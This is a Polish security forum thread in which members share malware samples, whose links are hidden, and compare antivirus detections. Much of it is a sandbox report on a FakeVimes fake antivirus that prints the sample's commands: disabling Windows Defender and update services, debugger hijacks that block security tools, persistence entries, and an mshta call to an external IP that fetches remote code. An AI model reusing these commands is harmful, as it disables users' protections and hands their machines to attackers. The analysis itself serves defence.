SafeGroup
Paczki, malware, złośliwe pliki, linki itp. - Wersja do druku

+- SafeGroup (https://safegroup.pl)
+-- Dział: Bezpieczeństwo (https://safegroup.pl/forum-10.html)
+--- Dział: Malware Lab (https://safegroup.pl/forum-20.html)
+--- Wątek: Paczki, malware, złośliwe pliki, linki itp. (/thread-472.html)

Strony: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917 918 919 920 921 922 923 924 925 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 952 953 954 955 956 957 958 959 960 961 962 963 964 965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1101 1102 1103 1104 1105 1106 1107 1108 1109 1110 1111 1112 1113 1114 1115 1116 1117 1118 1119 1120 1121 1122 1123 1124 1125 1126 1127 1128 1129 1130 1131 1132 1133 1134 1135 1136 1137 1138 1139 1140 1141 1142 1143 1144 1145 1146 1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 1186 1187 1188 1189


Re: malware - tomatto007 - 21.03.2014

2014-03-21-tomatto007_2151.7z 1.16 GB
Treść widoczna jedynie dla zarejestrowanych użytkowników



Re: malware - tachion - 22.03.2014

FakeAV - Windows Security Master z rodziny FakeVimes

Treść widoczna jedynie dla zarejestrowanych użytkowników

[Aby zobaczyć linki, zarejestruj się tutaj]



[Aby zobaczyć linki, zarejestruj się tutaj]


Kod:
Checked for debuggers
Checked if user is admin
Connected to WWW
Consent UI change: machine\software\microsoft\windows\currentversion\policies\system\consentpromptbehavioruser = empty value key
Created a mutex named: 234-456-456-456
Created a mutex named: AMResourceMutex3
Created process: C:\Windows\system32\cmd.exe, "C:\Windows\system32\cmd.exe" /c del "C:\Users\tachion\Desktop\setup.exe" >> NUL, C:\Users\tachion\Desktop
Created process: null, C:\Users\tachion\AppData\Roaming\svc-mnay.exe, null
Created process: null, mshta.exe "http://205.234.215.211/?0=1&1=0&2=29&3=i&4=7601&5=0&6=1111&7=fgihhnqlie", null
Created process: null, Reg.EXE add "HKCU\Software\Microsoft\Windows\CurrentVersion\RUN" /v "WERsv" /t REG_SZ /d "C:\Users\tachion\AppData\Roaming\svc-mnay.exe" /f, null
Created process: null, Reg.Exe Add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe" /v "Debugger" /t REG_SZ /d "\"wser.dll\" /z" /f, null
Created process: null, Reg.Exe Add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe" /v "Debugger" /t REG_SZ /d "\"wser.dll\" /z" /f, null
Created process: null, SC.Exe config bckwfs start= disabled, null
Created process: null, SC.Exe config luafv start= disabled, null
Created process: null, SC.Exe config msmpsvc start= disabled, null
Created process: null, SC.Exe config windefend start= disabled, null
Created process: null, SC.Exe config wscsvc start= disabled, null
Created process: null, SC.Exe config wuauserv start= disabled, null
Created process: null, SC.Exe stop bckwfs, null
Created process: null, SC.Exe stop wscsvc, null
Created process: null, SC.Exe stop wuauserv, null
Defined file type created: C:\Users\tachion\AppData\Roaming\svc-mnay.exe
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\k9filter.exe\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpcmdrun\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpsvc.dll\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpuxsrv.exe\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "wser.dll" /z
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSconfig.exe\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "wser.dll" /z
Defined registry AutoStart location created or modified: machine\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSseces\Debugger = c:\windows\1.EXE
Defined registry AutoStart location created or modified: machine\System\CurrentControlSet\Services\bckd\ImagePath = 33.sys
Defined registry AutoStart location created or modified: machine\System\CurrentControlSet\Services\wuauserv\Start = 00000004
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\RUN\WERsv = C:\Users\tachion\AppData\Roaming\svc-mnay.exe
Deleted activity traces
Detected Anti-Malware Analyzer routine
Executed Microsoft HTML Application Host
File copied itself
File deleted itself
Got input locale identifiers
Got volume information
Internet connection: C:\user\current\AppData\Roaming\svc-mnay.exe Connects to "216.146.39.70" on port 80 (TCP - HTTP)
Looked up the external IP address
Malicious category given by Adobe Malware Classifier
Queried DNS: checkip.dyndns.org
Queried DNS: dns.msftncsi.com
Security file association change: user\current\software\microsoft\windows\currentversion\policies\associations\lowriskfiletypes = .zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;
Slept over 2 minutes
System Policies change: machine\software\microsoft\windows\currentversion\policies\system\enablevirtualization = empty value key
Traces of Max++
Transfered files from and/or to internet
UAC configuration change: machine\software\microsoft\windows\currentversion\policies\system\enablelua = empty value key

Risk evaluation result: High


Report generated with Buster Sandbox Analyzer 1.88 at 22:02:13 on 22/03/2014

[ General information ]
* File name: C:\Users\tachion\Desktop\setup.exe
* File length: 1066496 bytes
* File signature (PEiD): ASProtect 1.2x - 1.3x [Registered] -> Alexey Solodovnikov
* File signature (Exeinfo): ASprotect ver 2.1 / 2.^ ( www.aspack.com ) -! Correct version detect only : ASPrINFO v 1.6 Beta 100% detector by nik0g0r 2oo7
* File type: EXE
* TLS hooks: NO
* File entropy: 7.98548 (99.8185%)
* ssdeep signature: 24576:ddqe3Hu1pA/SbQufxxoK/cRgOnmq9g6AB36rKX6tTZ:t36p4SbQuTjcOU7m6ElEd
* Adobe Malware Classifier: Malicious
* Digital signature: Unsigned
* MD5 hash: 53e7e28f383b456ee2c62b417c685eb1

[ Changes to filesystem ]
* Modifies file C:\Users\tachion\AppData\Local\Microsoft\Windows\WebCache\V01.chk
File length: 8192 bytes
File type: Unknown
MD5 hash: efc82676ddb2021a67d127ebbff278ec
* Deletes file C:\Users\tachion\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.tmp
* Creates file C:\Users\tachion\AppData\Roaming\svc-mnay.exe
File length: 1066496 bytes
File signature (PEiD): ASProtect 1.2x - 1.3x [Registered] -> Alexey Solodovnikov
File signature (Exeinfo): ASprotect ver 2.1 / 2.^ ( www.aspack.com ) -! Correct version detect only : ASPrINFO v 1.6 Beta 100% detector by nik0g0r 2oo7
File type: EXE
TLS hooks: NO
File entropy: 7.98548 (99.8185%)
ssdeep signature: 24576:ddqe3Hu1pA/SbQufxxoK/cRgOnmq9g6AB36rKX6tTZ:t36p4SbQuTjcOU7m6ElEd
Adobe Malware Classifier: Malicious
Digital signature: Unsigned
MD5 hash: 53e7e28f383b456ee2c62b417c685eb1
* Deletes file C:\Users\tachion\Desktop\setup.exe

[ Changes to registry ]
* Creates value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
* Creates value "UseGlobalSettings=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
* Empties value "EnableLUA" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Policies\System
old value "EnableLUA=00000001"
* Empties value "ConsentPromptBehaviorUser" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Policies\System
old value "ConsentPromptBehaviorUser=00000003"
* Empties value "EnableVirtualization" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Policies\System
old value "EnableVirtualization=00000001"
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\k9filter.exe
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpcmdrun
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpsvc.dll
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpuxsrv.exe
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "Debugger="wser.dll" /z" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
binary data=220077007300650072002E0064006C006C00220020002F007A000000
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSconfig.exe
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "Debugger="wser.dll" /z" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
binary data=220077007300650072002E0064006C006C00220020002F007A000000
* Creates value "Debugger=c:\windows\1.EXE" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSseces
binary data=63003A005C00770069006E0064006F00770073005C0031002E004500580045000000
* Creates value "ImagePath=33.sys" in key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bckd
binary data=330033002E007300790073000000
* Modifies value "Start=00000004" in key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\wuauserv
old value "Start=00000002"
* Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{01cd38c5-acde-11e2-b67a-806e6f6e6963}
old value empty
* Empties value "CachePrefix" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
old value "CachePrefix=0000"
* Modifies value "SavedLegacySettings=460000002E000000090000000000000000000000000000000500000000000000B0166103F640CE0100000000000000000000000001000000020000000A00020F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
old value "SavedLegacySettings=460000002C000000090000000000000000000000000000000500000000000000B0166103F640CE0100000000000000000000000001000000020000000A00020F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
* Modifies value "DefaultConnectionSettings=460000001E000000090000000000000000000000000000000500000000000000B0166103F640CE0100000000000000000000000001000000020000000A00020F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
old value "DefaultConnectionSettings=460000001D000000090000000000000000000000000000000500000000000000B0166103F640CE0100000000000000000000000001000000020000000A00020F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
* Modifies value "WpadDecisionTime=1A16E5431246CF01" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-12-35-02
old value "WpadDecisionTime=07E80B1FD445CF01"
* Modifies value "WpadDecisionTime=1A16E5431246CF01" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C9B0DDCB-A666-45E0-A453-3B1E7A772AA9}
old value "WpadDecisionTime=07E80B1FD445CF01"
* Creates value "LowRiskFileTypes=.zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Policies\Associations
binary data=2E007A00690070003B002E007200610072003B002E006E0066006F003B002E007400780074003B002E006500780065003B002E006200610074003B002E0063006F006D003B002E0063006D0064003B002E007200650067003B002E006D00730069003B002E00680074006D003B002E00680074006D006C003B002E006700690066003B002E0062006D0070003B002E006A00700067003B002E006100760069003B002E006D00700067003B002E006D007000650067003B002E006D006F0076003B002E006D00700033003B002E006D00330075003B002E007700610076003B000000
* Creates value "SaveZoneInformation=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Policies\Attachments
* Creates value "WERsv=C:\Users\tachion\AppData\Roaming\svc-mnay.exe" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\RUN
binary data=43003A005C00550073006500720073005C00740061006300680069006F006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C007300760063002D006D006E00610079002E006500780065000000
* Creates value "UID=fgihhnqlie" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Settings
binary data=660067006900680068006E0071006C00690065000000
* Creates value "net=_8" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Settings
binary data=5F0038000000
* Creates value "Config=DE07030006001600160003002D0055030000000000000000000000000000000000000000DE07030006001600160003002D005503DE07030006001600160003002D005503000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000B80B0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Settings
* Creates value "ip=89.76.213.4" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Settings
binary data=380039002E00370036002E003200310033002E0034000000
* Creates value "{7A80E4A8-8005-11D2-BCF8-00C04F72C717} {000214FA-0000-0000-C000-000000000046} 0xFFFF=0100000000000000981BC3411246CF01" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
* Creates value "LangID=1504" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
* Creates value "svc-mnay.exe=svc-mnay.exe" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Sandbox\tachion\DefaultBox\user\current\AppData\Roaming
binary data=7300760063002D006D006E00610079002E006500780065000000
* Creates value "mshta.exe=Host Microsoft (R) HTML Application" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
binary data=48006F007300740020004D006900630072006F0073006F006600740020002800520029002000480054004D004C0020004100700070006C00690063006100740069006F006E000000

[ Network services ]
* Looks for an Internet connection.
* Queries DNS "checkip.dyndns.org".
* Queries DNS "dns.msftncsi.com".
* Looks up the external IP address.
* C:\Sandbox\tachion\DefaultBox\user\current\AppData\Roaming\svc-mnay.exe Connects to "216.146.39.70" on port 80 (TCP - HTTP).
* Downloads file from "checkip.dyndns.org/".
* Opens next URLs:
http://checkip.dyndns.org/

[ Process/window/string information ]
* Gets input locale identifiers.
* Gets volume information.
* Checks for debuggers.
* Checks if user is admin.
* Deletes activity traces.
* Anti-Malware Analyzer routine: Disk information query.
* Creates a mutex "AMResourceMutex3".
* Creates process "null, C:\Users\tachion\AppData\Roaming\svc-mnay.exe, null".
* Injects code into process "C:\Sandbox\tachion\DefaultBox\user\current\AppData\Roaming\svc-mnay.exe".
* Creates process "C:\Windows\system32\cmd.exe, "C:\Windows\system32\cmd.exe" /c del "C:\Users\tachion\Desktop\setup.exe" >> NUL, C:\Users\tachion\Desktop".
* Injects code into process "C:\Windows\System32\cmd.exe".
* Enables privilege SeDebugPrivilege.
* Creates process "null, Reg.EXE add "HKCU\Software\Microsoft\Windows\CurrentVersion\RUN" /v "WERsv" /t REG_SZ /d "C:\Users\tachion\AppData\Roaming\svc-mnay.exe" /f, null".
* Injects code into process "C:\Windows\System32\reg.exe".
* Creates process "null, mshta.exe "http://205.234.215.211/?0=1&1=0&2=29&3=i&4=7601&5=0&6=1111&7=fgihhnqlie", null".
* Injects code into process "C:\Windows\System32\mshta.exe".
* Creates process "null, SC.Exe stop bckwfs, null".
* Injects code into process "C:\Windows\System32\sc.exe".
* Creates process "null, SC.Exe config bckwfs start= disabled, null".
* Creates process "null, SC.Exe stop wuauserv, null".
* Creates process "null, SC.Exe config wuauserv start= disabled, null".
* Creates process "null, SC.Exe stop wscsvc, null".
* Creates process "null, SC.Exe config wscsvc start= disabled, null".
* Creates process "null, SC.Exe config luafv start= disabled, null".
* Creates process "null, SC.Exe config windefend start= disabled, null".
* Creates process "null, SC.Exe config msmpsvc start= disabled, null".
* Creates process "null, Reg.Exe Add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe" /v "Debugger" /t REG_SZ /d "\"wser.dll\" /z" /f, null".
* Creates process "null, Reg.Exe Add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe" /v "Debugger" /t REG_SZ /d "\"wser.dll\" /z" /f, null".
* Creates a mutex "234-456-456-456".
* Opens a service named "bckwfs".
* Enumerates running processes.
* Opens a service named "wuauserv".
* Stops a service.
* Changes a service.
* Opens a service named "wscsvc".
* Opens a service named "luafv".
* Opens a service named "windefend".
* Opens a service named "msmpsvc".
* Enables privilege SeShutdownPrivilege.
* Enables privilege SeManageVolumePrivilege.
* Opens a service named "Csc".
* Opens a service named "CscService".
* Enables process privileges.
* Sleeps 1933 seconds.


[Aby zobaczyć linki, zarejestruj się tutaj]




Re: malware - Twoja stara - 22.03.2014

Treść widoczna jedynie dla zarejestrowanych użytkowników



Re: malware - tachion - 22.03.2014

Strona jest czysta

Być może kiedyś rozpowszechniała 0day


Re: malware - Twoja stara - 22.03.2014

Dostałem na maila.


Re: malware - Eugeniusz - 22.03.2014

Nie powinno się klikać w linki ze spamu. Przez to możesz dać znać spamerowi, że czytasz jego emaile. A to oznacza jeszcze więcej spamu i więcej $$$ dla spamera za wysyłanie wiadomości.


Re: malware - myciu1974 - 23.03.2014

tachion napisał(a):FakeAV - Windows Security Master z rodziny FakeVimes

Malware:

Temporary error.


Re: malware - slav - 23.03.2014

Fake AV- Windows Security Master z rodziny FakeVimes

KIS 2014 wykrywa


Re: malware - Patrick Bateman - 23.03.2014

Twoja stara napisał(a):Dostałem na maila.

Na Onecie i Gmailu spam to absolutna rzadkość (poza ich reklamami), a taki z malware nie pojawił się nigdy. Gdzie wy macie te poczty? Wow


Re: malware - Twoja stara - 23.03.2014

Eugeniusz napisał(a):Nie powinno się klikać w linki ze spamu. Przez to możesz dać znać spamerowi, że czytasz jego emaile. A to oznacza jeszcze więcej spamu i więcej $$$ dla spamera za wysyłanie wiadomości.


Nie klikałem Smile Skopiowałem linka i zgłosiłem jako oszustwo internetowe.
Pocztę mam na onecie.


Re: malware - zbc - 23.03.2014

Treść widoczna jedynie dla zarejestrowanych użytkowników
Cóż to jest?
Raport VT:

[Aby zobaczyć linki, zarejestruj się tutaj]




Re: malware - danisss - 24.03.2014

Zero day facebook adware
Treść widoczna jedynie dla zarejestrowanych użytkowników



Re: malware - tachion - 24.03.2014

danisss napisał(a):Zero day facebook adware


CHR Extension: (FbCores) - C:\Users\tachion\AppData\Local\Google\Chrome\User Data\Default\Extensions\egnfcacjiilnkmekmggfkdlaifjbpmkp
CHR DefaultSearchKeyword: google.com.br

[Aby zobaczyć linki, zarejestruj się tutaj]

:)


Re: malware - slav - 25.03.2014

Zero day facebook adware

KIS 2014 nic nie widzi


Re: malware - myciu1974 - 26.03.2014

danisss napisał(a):Zero day facebook adware
Treść widoczna jedynie dla zarejestrowanych użytkowników

Emsi : Trojan.GenericKD.1611623 (B)


Dodano: 26 mar 2014, 8:43

slav napisał(a):Zero day facebook adware

KIS 2014 nic nie widzi

Bo pewnie to FSB rozsyła .


Re: malware - slav - 26.03.2014

No nie wiem czy FSB bo MBAM 2 też nic


Re: malware - myciu1974 - 26.03.2014

@slav , żart , zobacz

[Aby zobaczyć linki, zarejestruj się tutaj]

,
wykrywa większość softów,ale z silnikami Bitdefendera.


Re: malware - slav - 26.03.2014

Spoko.Wiem.Taż sprawdzałem.Plik wysłałem do KSN


Re: malware - Ambient - 26.03.2014

danisss napisał(a):Zero day facebook adware
Treść widoczna jedynie dla zarejestrowanych użytkowników

OSS v9.1

[Aby zobaczyć linki, zarejestruj się tutaj]




Re: malware - Twoja stara - 26.03.2014

danisss napisał(a):Zero day facebook adware
Treść widoczna jedynie dla zarejestrowanych użytkowników


Avast nie wykrywa
Malwarebytes nie wykrywa